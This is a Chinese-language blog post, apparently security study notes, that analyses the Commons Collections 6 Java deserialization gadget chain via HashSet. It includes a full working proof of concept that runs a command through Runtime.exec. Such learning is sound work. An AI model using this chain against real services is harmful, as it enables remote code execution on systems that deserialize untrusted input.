java--commoncollections6 续

最新推荐文章于 2024-06-21 17:14:47 发布
最新推荐文章于 2024-06-21 17:14:47 发布
阅读量128 收藏
点赞数 1
分类专栏: 代码审计学习 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44769520/article/details/124738733
版权

上篇文章我们使用了HashSet作为反序列化函数的出发点,其实HashSet也可以作为出发点,我们使用HashSet构造payload

package com.zyer;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;


public class test {
    public static void main(String[] args) throws Exception {
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"}),
                new ConstantTransformer(1),
        };
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap,transformerChain);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap,"zyer");
        HashMap hashMap = new HashMap();
        HashSet set = new HashSet();
        set.add(tiedMapEntry);
        outerMap.clear();

        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);
        // 序列化
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("1.txt"));
        oos.writeObject(set);

        // 反序列化
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("1.txt"));
        ois.readObject();

    }
}

过程十分简单,和HashMap一样,我们可以看一下HashSet的readObject方法

private void readObject(java.io.ObjectInputStream s)
        throws java.io.IOException, ClassNotFoundException {
        // Consume and ignore stream fields (currently zero).
        s.readFields();
        // Read capacity and verify non-negative.
        int capacity = s.readInt();
        if (capacity < 0) {
            throw new InvalidObjectException("Illegal capacity: " +
                                             capacity);
        }

..............
        // Create backing HashMap
        map = (((HashSet<?>)this) instanceof LinkedHashSet ?
               new LinkedHashMap<E,Object>(capacity, loadFactor) :
               new HashMap<E,Object>(capacity, loadFactor));

        // Read in all elements in the proper order.
        for (int i=0; i<size; i++) {
            @SuppressWarnings("unchecked")
                E e = (E) s.readObject();
            map.put(e, PRESENT);
        }
    }

截取了一部分,可以看到最后那,发现还是使用了map.put方法

那么payload就很好理解了

所以调用链:

HashSet.readObject()/HashMap.readObject()
    HashMap.put()
        HashMap.hash()
            TiedMapEntry.hashCode()
                LazyMap.get()
                    ChainedTransformer.transform()
                        InvokerTransformer.transform()

zyer1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java反序列化(八)Common Collection 6分析
Vicl1fe的博客
09-26 311
前言 环境 jdk1.7 Commons Collections 3.1 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> 利用链 java.io.Objec
CommonsCollection6反序列化链学习
m0_56069948的博客
04-04 868
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 CommonsCollection6 1、前置知识 1.1、HashSet HashSet 基于 HashMap 来实现的,是一个不允许有重复元素的集合。继承了序列化和集合 构造函数参数为空的话创建一个HashMap(),有一个参数的情况下,要创建指定容量的初始数值的哈希集合。
apache-commons-collections6反序列化链分析
12-02 417
apache-commons-collections6反序列化链分析 apache-commons-collections6反序列化链利用的也是通过TiedMapEntry.getValue方法调用一系列的transform方法执行系统命令的,下面就分析分析这条链 复现环境 JDK7+CommonsCollections1 漏洞分析 看到CommonsCollections6类的getObject方法,前面是很熟悉的Transformer数组构造,数组构造和ACC5也是一样的,这里直接在实例化Chained
Common-Collections 6
Christ1na的博客
09-26 334
这个利⽤链可以在Java 7和8的⾼版本触发,没有版本限制,所以通用性较强
Commons-Collections6 反序列化 从0开始手写exp
weixin_51458899的博客
04-11 2122
CC6 cc6的出现弥补了前面的cc1的setValue的缺陷,使得它可以在高于jdk8u65的情况下使用,jdk11不行 ysoserial/CommonsCollections6.java at master · frohoff/ysoserial (github.com) 如何手写exp 可以看到 后半段仍然与yso的cc1一致(一直到LazyMap.get) 调用了TiedMapEntry,进去 hashcode里面调用了getvalue 这里是map.get key对应的value如果改成恶
CommonsCollections6分析
笑花大王
01-02 368
CommonsCollections6 LazyMap的漏洞触发在get和invoke中,完全没有setValue什么事,这也说明8u71后不能利用的原因和AnnotationInvocationHandler#readObject 中有没有setValue没任何关系在java8u71以后sun.reflect.annotation.AnnotationInvocationHandler#rea...
weixin-java-common-3.5.0-API文档-中文版.zip
07-14
赠送jar包:weixin-java-common-3.5.0.jar; 赠送原API文档:weixin-java-common-3.5.0-javadoc.jar; 赠送源代码:weixin-java-common-3.5.0-sources.jar; 赠送Maven依赖信息文件:weixin-java-common-3.5.0.pom;...
weixin-java-common-3.5.0-API文档-中英对照版.zip
07-13
赠送jar包:weixin-java-common-3.5.0.jar; 赠送原API文档:weixin-java-common-3.5.0-javadoc.jar; 赠送源代码:weixin-java-common-3.5.0-sources.jar; 赠送Maven依赖信息文件:weixin-java-common-3.5.0.pom;...
weixin-java-common-2.8.0-API文档-中文版.zip
07-13
赠送jar包:weixin-java-common-2.8.0.jar; 赠送原API文档:weixin-java-common-2.8.0-javadoc.jar; 赠送源代码:weixin-java-common-2.8.0-sources.jar; 赠送Maven依赖信息文件:weixin-java-common-2.8.0.pom;...
jiguang-java-client-common:极光Java客户端通用库
05-29
JiGuang Common for JavaCommon lib for JiGuang Java clients.概述这是极光 Java client 的公共封装开发包,为 , , 等 client 提供公共依赖。版本更新:。下载更新请到这里。新增 http2 分支,使用 Netty 第三方...
Java-Generics-and-Collections
06-11
Java-Generics-and-Collections
java--commoncollections6 反序列化利用学习
zyer
05-12 244
总结 上周花了一周的时间学习commoncollections1,对java的反序列化利用好像有一丝丝的理解了。 暂时的思路就是:首先寻找存在对应方法的类,LazyMap-->get,TransformedMap-->setValue,put 从寻找一个存在readObject方法的类出发,通过寻找其它Object导致最后能触发上面的方法。 问题所在 从commoncollections1的学习发现,这条利用链对jdk版本有限制,高版本的jdk使用不了,具体原因就是在Java 8u71
[Java反序列化]—CommonsCollections6
Sentiment的博客
05-27 1044
前言 在开始前先回顾了一下之前的CommonsCollections1和URLDNS,因为本篇跟之前有一定联系,其次其实也是为了巩固下毕竟已经忘的差不多了。 接上篇,CC1的JDK版本需要低于8u71,AnnotationInvocationHandler类的readObject()方法在8u71以后逻辑就发生了改变,不能再利用了,所以就需要找一个绕过高版本的利用链—CommonsCollections6 分析 cc1的LazyMap链:readObject()->invoker()->get(
Commons-Collections6分析
Le1a's Blog
03-23 2119
Java反序列化
CommonCollections6链分析
Demodd的博客
03-20 4198
前言 ​ 本文参考b站白日梦组长仅做笔记记录,完全跟着他复现,大家可以参考他的视频学习。 Gadget分析 因为只看了cc1可以说cc6利用的是cc1的前半部分,一直到LazyMap.decorate Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("get
Java反序列化7-CommonsCollections6利用链分析
weixin_43263451的博客
07-30 342
利用hashSet.readobject触发hashmap.put()从而触发tiedmap.hashcode从而调用getvalue从而调用lazymap.get进而进入ChainedTransformer.tranform。ysoserial是利用hashset.readobject触发hashmap.put(),其实在hashmap.readobject中也会触发hashmap.put(),所以这里用的hashmap而不是hashset。hashset.add其实就是给其hashmap赋了个值。...
数据结构与算法-差分数组及应用
qq_36115196的博客
06-20 754
差分数组: 其实差分数组是创建一个一个辅助数组,用来表示给定数组的变化,一般用来对数组进行区间修改的操作。
Day43
m0_67496588的博客
06-20 1013
JSON,Ajax
Homebrew使用
最新发布
gghh2015的博客
06-21 221
具体参考:https://blog.csdn.net/m0_67402970/article/details/126434901。简介:https://www.jianshu.com/p/f4c9cf0733ea。2、查看安装路径:brew list maven。官网:https://brew.sh/
selenium-java-4.0.0-alpha-6 下载
09-10
要下载selenium-java-4.0.0-alpha-6版本,可以按照以下步骤进行操作: 1. 打开浏览器,进入Selenium的官方网站。 2. 在网站中找到"Selenium Client & WebDriver Language Bindings"的下载页面。 3. 在下载页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值